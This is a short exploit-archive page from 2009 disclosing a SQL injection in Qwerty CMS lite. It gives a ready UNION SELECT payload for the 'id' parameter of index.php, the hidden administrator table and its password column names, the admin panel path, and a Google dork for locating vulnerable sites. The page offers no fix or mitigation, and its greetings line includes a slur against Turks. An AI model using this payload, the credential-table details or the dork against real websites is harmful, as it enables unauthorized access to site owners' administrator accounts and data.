[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Qwerty CMS (id) Remote SQL Injection Vulnerability
# Published : 2009-02-24
# Author : b3
# Previous Title : XGuestBook 2.0 (Auth Bypass) SQL Injection Vulnerability
# Next Title : zFeeder 1.6 (admin.php) No Authentication Vulnerability
QWERTY CMS lite - SQL INJ
Found: b3 from GraBBerZ.com
=
Injection in index.php variable: id
http://[site]/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
=
Administrator Table: rkh8t5po
Columns: secret873ktlW,pass459khyf
Column with pass: pass459khyf
Admin CP: /admin/admin.php
=
CMS PAGE : http://web-sites.kiev.ua
GOOGLE DORK : allinurl:index.php?act=publ
Greetz: GraBBerZ, Antichat, XN, no respect all Turk =
# www.Syue.com [2009-02-24]